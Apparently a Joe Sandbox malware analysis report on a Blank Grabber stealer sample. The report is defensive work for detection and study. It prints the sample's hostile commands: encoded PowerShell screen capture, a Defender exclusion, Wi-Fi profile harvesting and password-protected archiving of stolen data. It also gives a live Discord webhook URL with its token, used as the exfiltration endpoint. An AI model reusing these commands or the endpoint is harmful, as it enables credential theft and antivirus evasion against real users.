              Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: Process startedAuthor: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM
              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\HeilHitler.exe", ParentImage: C:\Users\user\Desktop\HeilHitler.exe, ParentProcessId: 7448, ParentProcessName: HeilHitler.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard", ProcessId: 8080, ProcessName: cmd.exe
              Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\HeilHitler.exe", ParentImage: C:\Users\user\Desktop\HeilHitler.exe, ParentProcessId: 7448, ParentProcessName: HeilHitler.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'", ProcessId: 7496, ProcessName: cmd.exe
              Source: Process started; Author: frack113; Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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
              Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 8084, TargetFilename: C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.cmdline
              Source: Process started; Author: Timur Zinniatullin, E.M. Anhaus, oscd.community; Data: Command: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe a -r -hp"fuck123" "C:\Users\user\AppData\Local\Temp\8KaTn.zip" *, CommandLine: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe a -r -hp"fuck123" "C:\Users\user\AppData\Local\Temp\8KaTn.zip" *, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe a -r -hp"fuck123" "C:\Users\user\AppData\Local\Temp\8KaTn.zip" *", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7920, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe a -r -hp"fuck123" "C:\Users\user\AppData\Local\Temp\8KaTn.zip" *, ProcessId: 3400, ProcessName: rar.exe
              Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7496, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\HeilHitler.exe', ProcessId: 7600, ProcessName: powershell.exe

              Data Obfuscation

              Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand 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

              Stealing of Sensitive Information

              Source: Process started; Author: Joe Security; Data: Command: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\HeilHitler.exe", ParentImage: C:\Users\user\Desktop\HeilHitler.exe, ParentProcessId: 7448, ParentProcessName: HeilHitler.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "netsh wlan show profile", ProcessId: 1928, ProcessName: cmd.exe
              No Suricata rule has matched


              AV Detection

              Source: HeilHitler.exe.7448.1.memstrmin; Malware Configuration Extractor: Blank Grabber {"C2 url": "https://discord.com/api/webhooks/1302413781162266715/WJ0cdpWb68IO94MZWMtc7o2HkgZFWYLoExtrMC3fyimxUgR5SCyIRovGkrea9pNRE2_V"}
              Source: HeilHitler.exe; ReversingLabs: Detection: 47%
              Source: Submitted Sample; Integrated Neural Analysis Model: Matched 99.9% probability
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe; Code function: 68_2_00007FF702C1901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,68_2_00007FF702C1901C
              Source: HeilHitler.exe; Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: Binary string: C:\A\40\b\bin\amd64\sqlite3.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2035903774.00007FFDFB2C1000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: HeilHitler.exe
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.pdbhP source: powershell.exe, 00000026.00000002.1830812751.000002871BA75000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\_w\1\b\libssl-1_1.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: HeilHitler.exe, 00000001.00000002.2034614271.00007FFDFB18E000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: HeilHitler.exe, 00000000.00000003.1677234536.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2040274922.00007FFE13341000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: C:\A\40\b\bin\amd64\_ctypes.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2039889853.00007FFE13301000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: HeilHitler.exe, 00000000.00000003.1677234536.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000001.00000002.2040274922.00007FFE13341000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: C:\A\40\b\bin\amd64\_sqlite3.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2038522061.00007FFE11EB1000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_queue.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2039368203.00007FFE12E11000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\python310.pdb source: HeilHitler.exe, 00000001.00000002.2036487623.00007FFDFB784000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000044.00000000.1908593127.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmp, rar.exe, 00000044.00000002.1923462255.00007FF702C70000.00000002.00000001.01000000.0000001A.sdmp, rar.exe.0.dr
              Source: Binary string: C:\A\40\b\bin\amd64\_lzma.pdbNN source: HeilHitler.exe, 00000001.00000002.2039054275.00007FFE126EC000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_lzma.pdb source: HeilHitler.exe, 00000001.00000002.2039054275.00007FFE126EC000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\select.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2039626853.00007FFE130C1000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: \0q.pdb source: powershell.exe, 00000026.00000002.1894620467.000002873381B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\unicodedata.pdb source: HeilHitler.exe, 00000001.00000002.2033758431.00007FFDFAE6C000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: HeilHitler.exe, 00000001.00000002.2034183596.00007FFDFAEF6000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_ssl.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2037493230.00007FFE0EB41000.00000040.00000001.01000000.0000000E.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_socket.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2038127785.00007FFE11511000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_bz2.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2038813190.00007FFE11ED1000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1q 5 Jul 2022built on: Thu Aug 18 20:15:42 2022 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: HeilHitler.exe, 00000001.00000002.2034614271.00007FFDFB18E000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: C:\A\40\b\bin\amd64\_hashlib.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2037789105.00007FFE10301000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: 7C:\Users\user\AppData\Local\Temp\0qdpbrpq\0qdpbrpq.pdb source: powershell.exe, 00000026.00000002.1830812751.000002871BA75000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: HeilHitler.exe, HeilHitler.exe, 00000001.00000002.2034614271.00007FFDFB210000.00000040.00000001.01000000.0000000F.sdmp
              Source: C:\Users\user\Desktop\HeilHitler.exe; Code function: 0_2_00007FF633D683C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00007FF633D683C0
              Source: C:\Users\user\Desktop\HeilHitler.exe; Code function: 0_2_00007FF633D69280 FindFirstFileExW,FindClose,0_2_00007FF633D69280
              Source: C:\Users\user\Desktop\HeilHitler.exe; Code function: 0_2_00007FF633D81874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF633D81874
              Source: C:\Users\user\Desktop\HeilHitler.exe; Code function: 1_2_00007FF633D69280 FindFirstFileExW,FindClose,1_2_00007FF633D69280
              Source: C:\Users\user\Desktop\HeilHitler.exe; Code function: 1_2_00007FF633D683C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,1_2_00007FF633D683C0
              Source: C:\Users\user\Desktop\HeilHitler.exe; Code function: 1_2_00007FF633D81874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,1_2_00007FF633D81874
              Source: C:\Users\user\Desktop\HeilHitler.exe; Code function: 1_2_00007FFDFAF43229 MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,00007FFE1FF9F020,FindFirstFileW,FindNextFileW,WideCharToMultiByte,1_2_00007FFDFAF43229
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe; Code function: 68_2_00007FF702C246EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,68_2_00007FF702C246EC
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe; Code function: 68_2_00007FF702C1E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,68_2_00007FF702C1E21C
              Source: C:\Users\user\AppData\Local\Temp\_MEI74322\rar.exe; Code function: 68_2_00007FF702C688E0 FindFirstFileExA,68_2_00007FF702C688E0
              Source: C:\Users\user\Desktop\HeilHitler.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
              Source: C:\Users\user\Desktop\HeilHitler.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
              Source: C:\Users\user\Desktop\HeilHitler.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
              Source: C:\Users\user\Desktop\HeilHitler.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
              Source: C:\Users\user\Desktop\HeilHitler.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\uk\
              Source: C:\Users\user\Desktop\HeilHitler.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\
              Source: Joe Sandbox View; IP Address: 208.95.112.1
              Source: Joe Sandbox View; IP Address: 162.159.128.233
              Source: unknown; DNS query: name: ip-api.com
              Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global traffic; HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.2
              Source: HeilHitler.exe, 00000001.00000002.2031849271.000001BD43CA4000.00000004.00001000.00020000.00000000.sdmp; String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
              Source: global traffic; DNS traffic detected: DNS query: ip-api.com
              Source: global traffic; DNS traffic detected: DNS query: discord.com
              Source: unknown; HTTP traffic detected: POST /api/webhooks/1302413781162266715/WJ0cdpWb68IO94MZWMtc7o2HkgZFWYLoExtrMC3fyimxUgR5SCyIRovGkrea9pNRE2_V HTTP/1.1Host: discord.comAccept-Encoding: identityContent-Length: 759927User-Agent: python-urllib3/2.2.2Content-Type: multipart/form-data; boundary=8a9179acbaa5554a9b480b1ba637caac
              Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Nov 2024 09:44:36 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1731663877x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sL1ESUKxhK9%2Babw4uCeDjxgqI4thUCNJCC78TML%2F85lNJMjNqLMWZ7Zs%2FqLOkjx%2BeMM11gsaMrJdKoNakvekrPA90Myi75LQhPIN6Y5BQQA7YVaXA%2FFvJrTzqQTB"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=f55cd052b753aefed4ac19e3284c0198d78f1511-1731663876; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=g7xrMuiCuj5YxJWgwxHxx7_wo5yDsKgDIiJmgNGLoGA-1731663876289-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8e2e4db66acf6bce-DFW
              Source: HeilHitler.exe, 00000000.00000003.1679598819.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1679598819.0000028B9208C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
              Source: HeilHitler.exe, 00000000.00000003.1678668051.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1678458745.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1678252343.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1681133155.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1679683243.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1680725372.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1678076504.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1678458745.0000028B9208C000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1679884394.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1678337779.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1678569630.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1680619720.0000028B9208C000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1680619720.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000002.2044382544.0000028B9208C000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1677368472.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1679315296.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1677584002.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1678764252.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, select.pyd.0.dr, _decimal.pyd.0.dr, _socket.pyd.0.dr; String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: HeilHitler.exe, 00000000.00000003.1679598819.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1679598819.0000028B9208C000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
              Source: HeilHitler.exe, 00000000.00000003.1678668051.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1678458745.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1678252343.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1681133155.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1679683243.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1680725372.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1678076504.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1679884394.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1678337779.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1678569630.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 00000000.00000003.1680619720.0000028B9207F000.00000004.00000020.00020000.00000000.sdmp, HeilHitler.exe, 